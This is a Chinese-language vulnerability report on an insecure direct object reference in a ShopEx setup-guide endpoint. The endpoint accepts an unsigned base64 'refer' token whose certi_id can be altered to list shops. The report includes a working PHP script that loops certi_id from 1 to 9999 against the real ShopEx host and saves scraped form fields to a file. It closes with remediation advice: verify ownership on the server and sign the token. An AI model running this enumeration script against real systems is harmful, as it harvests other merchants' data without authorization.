简要描述:
ShopEx 某接口存在缺陷（refer 中的 certi_id 未做归属校验），可遍历所有使用 ShopEx 程序的网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0= （原帖 URL 中段已被截断；完整形式见下方代码：step2.php?refer=<base64>）
refer 参数经 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"} （注意：base64 只是编码而非加密，没有签名，客户端可以任意构造其内容）
我们只需修改 certi_id 的值，即可遍历所有使用了 ShopEx 程序的网站——服务端显然没有校验该 certi_id 是否属于当前请求者，属于典型的不安全直接对象引用（IDOR）。
<?php

// Sweep certi_id 1..9999 against the ShopEx guide endpoint and dump whatever
// ShowshopExD() scrapes for each id. This fires ~10k sequential requests at a
// third-party host with no delay and no error handling -- only run it against
// systems you are authorized to test.
$lastCertiId = 9999;
for ($certiId = 1; $certiId <= $lastCertiId; $certiId++) {
    ShowshopExD($certiId);
}
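/**
 * Probe one certificate id against the ShopEx guide "step2" page.
 *
 * Builds the same base64-encoded JSON "refer" token the endpoint expects, with
 * only certi_id varied, fetches the page, and -- if the page echoes our token
 * back (the only "hit" criterion the original used) -- scrapes every
 * <input type="text"> name/value pair, echoes each one and appends it to
 * $outFile. The endpoint trusts a client-built, unsigned refer token and does
 * not appear to check that certi_id belongs to the caller, which is what makes
 * this enumeration possible.
 *
 * @param int|string $cid     certificate id to probe (normalised with intval())
 * @param string     $outFile file the scraped fields are appended to
 *                            (default preserved from the original: c:/shopEx.txt)
 * @return void
 */
function ShowshopExD($cid, $outFile = 'c:/shopEx.txt') {
    $url = 'http://guide.ecos.shopex.cn/step2.php';

    // Same payload shape the vulnerable endpoint consumes; only certi_id varies.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url.'?refer='.$refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // Without timeouts one unresponsive request stalls the whole sweep.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $result = curl_exec($ch);
    curl_close($ch);

    // curl_exec() returns false on a transport failure; the original fed that
    // straight into mb_convert_encoding()/strpos() as an empty string.
    if ($result === false) {
        flush();
        return;
    }

    // Assumes the response is UTF-8 and the console/output file want GB2312
    // (kept from the original) -- TODO confirm against the actual page charset.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // The original used `if (strpos(...))`, which also discards a match at
    // offset 0; compare against false explicitly.
    if (strpos($result, $refer) !== false) {
        // Opening may fail (bad path, permissions); the original then called
        // fwrite() on false. We still echo the rows so the hit is not lost.
        $fp = fopen($outFile, 'ab');

        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $attrs) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $res);
            // An input lacking name= or value= yields no match; the original
            // then read undefined offsets and emitted a bare ":" row.
            if (!isset($res[1][0], $res[3][0])) {
                continue;
            }

            $col = $res[1][0].':'.$res[3][0]."\r\n";
            echo $col;
            if ($fp !== false) {
                fwrite($fp, $col);
            }
        }

        echo '--------------------------------'."\r\n";

        if ($fp !== false) {
            fclose($fp);
        }
    }

    flush();
}
?>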
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议：仅把 refer 换成其他加密/编码方式并不够——只要 refer 仍由客户端生成，攻击者照样可以构造任意 certi_id。服务端应在使用 certi_id 前校验它是否属于当前登录会话/店铺；若 refer 必须由客户端回传，则应由服务端用密钥对其签名（如 HMAC）并在解析前验签，拒绝一切签名不匹配的请求。